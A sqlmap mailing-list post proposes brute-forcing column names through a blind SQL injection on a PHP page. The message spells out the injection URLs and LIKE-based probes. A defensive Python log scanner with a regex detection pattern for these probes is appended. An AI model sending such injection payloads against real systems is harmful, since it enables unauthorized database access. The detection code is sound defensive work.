Hi,
I'm checking that sqlmap can't work with this injection, or maybe I can't
see the correct option.
Injection is like this:
Original URL:
http://10.0.17.252/stat.php?id=534&key=a4d80eac9ab26a4a2da04125bc2c096a
Injection:
http://10.0.17.252/stat.php?id=534' AND '1'='1&key=a4d80eac9ab26a4a2da04125bc2c096a
The problem is that the MySQL user can't run UNION SELECT, so if I run sqlmap
it detects the injection but shows nothing.
Maybe it is a good idea to implement a brute-force attack to retrieve columns.
Example:
http://10.0.17.252/stat.php?id=534' AND `name` LIKE '%&key=a4d80eac9ab26a4a2da04125bc2c096a
=> Shows the normal page, so the `name` column exists.
http://10.0.17.252/stat.php?id=534' AND `name2` LIKE '%&key=a4d80eac9ab26a4a2da04125bc2c096a
=> Shows "Wrong query", so this column doesn't exist.
I tried with --common-columns, but it needs the name of the table, and we don't
know this value.
It's only an idea.
Thanks for all.
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
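
Added example, not part of the original message and not sqlmap code: a defender-side check that flags the column-guessing requests described above in a web access log and counts how many distinct identifiers each client has probed. The log format, client addresses and threshold are assumptions, and the sample lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines: "<client> <request-target>". The format and the
# client addresses are assumptions; the request shapes follow the message above.
SAMPLE_LOG = """\
192.0.2.10 /stat.php?id=534&key=a4d80eac9ab26a4a2da04125bc2c096a
192.0.2.10 /stat.php?id=535&key=a4d80eac9ab26a4a2da04125bc2c096a
192.0.2.77 /stat.php?id=534%27%20AND%20%271%27=%271&key=a4d80eac9ab26a4a2da04125bc2c096a
192.0.2.77 /stat.php?id=534%27%20AND%20%60name%60%20LIKE%20%27%25&key=a4d80eac9ab26a4a2da04125bc2c096a
192.0.2.77 /stat.php?id=534%27%20AND%20%60name2%60%20LIKE%20%27%25&key=a4d80eac9ab26a4a2da04125bc2c096a
192.0.2.77 /stat.php?id=534%27+and+%60email%60+like+%27%25&key=a4d80eac9ab26a4a2da04125bc2c096a
""".splitlines()

# A quote closing the id value, then AND/OR, a backtick-quoted identifier and LIKE.
PROBE = re.compile(r"'\s*(?:and|or)\s+`([^`]+)`\s+(?:not\s+)?like\b", re.I)

def classify(target):
    """Return (kind, identifier) for the decoded id parameter of one request."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    value = query.get("id", [""])[0]
    if re.fullmatch(r"[0-9]+", value):
        return ("ok", None)                  # id is the plain integer the page expects
    match = PROBE.search(value)
    if match:
        return ("column-probe", match.group(1))
    return ("tampered", None)                # non-numeric id, e.g. the '1'='1 test

def summarize(lines):
    """Per client: count of non-numeric id requests and the identifiers probed."""
    stats = defaultdict(lambda: {"tampered": 0, "identifiers": set()})
    for line in lines:
        client, target = line.split(" ", 1)
        kind, identifier = classify(target)
        if kind == "ok":
            continue
        stats[client]["tampered"] += 1
        if identifier:
            stats[client]["identifiers"].add(identifier.lower())
    return dict(stats)

def enumerating_clients(lines, threshold=3):
    """Clients that probed at least `threshold` distinct identifiers (assumed cutoff)."""
    return sorted(c for c, s in summarize(lines).items()
                  if len(s["identifiers"]) >= threshold)

if __name__ == "__main__":
    for client, s in summarize(SAMPLE_LOG).items():
        print(client, s["tampered"], sorted(s["identifiers"]))
```
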